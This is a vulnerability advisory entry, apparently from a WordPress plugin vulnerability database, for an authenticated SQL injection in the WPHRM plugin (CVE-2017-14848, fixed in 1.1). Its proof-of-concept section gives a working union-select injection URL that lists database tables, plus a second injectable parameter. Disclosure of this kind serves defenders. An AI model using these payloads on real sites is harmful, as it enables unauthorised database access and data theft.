WPHRM <= 1.0 – Authenticated SQL Injection | CVE 2017-14848 | Plugin Vulnerabilities

Description

The vulnerability allows an employee users to inject SQL commands.

Proof of Concept

http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]-23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-

http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]

Affects Plugins

Fixed in 1.1

References

CVE

Exploitdb

URL

https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Submitter

David Hayes

Submitter website

https://wpshout.com

Submitter twitter

Verified

No

WPVDB ID

e38c59e7-e73f-4961-8bbc-78e9c0ca1b1a

Timeline

Publicly Published

2017-09-09 (about 8 years ago)

Added

2017-10-11 (about 8 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2022-12-09

Title

WP RSS By Publishers <= 0.1 - Admin+ SQLi

Published

2014-08-01

Title

Events Calendar - SQL Injection

Published

2014-08-01

Title

Ajax Gallery <= 3.0 - SQL Injection

Published

2024-12-29

Title

Shipping for Nova Poshta plugin for WordPress < 1.19.7 - Unauthenticated SQL Injection

Published

2025-02-20

Title

WPExperts Square For GiveWP < 1.3.2 - Authenticated (Subscriber+) SQL Injection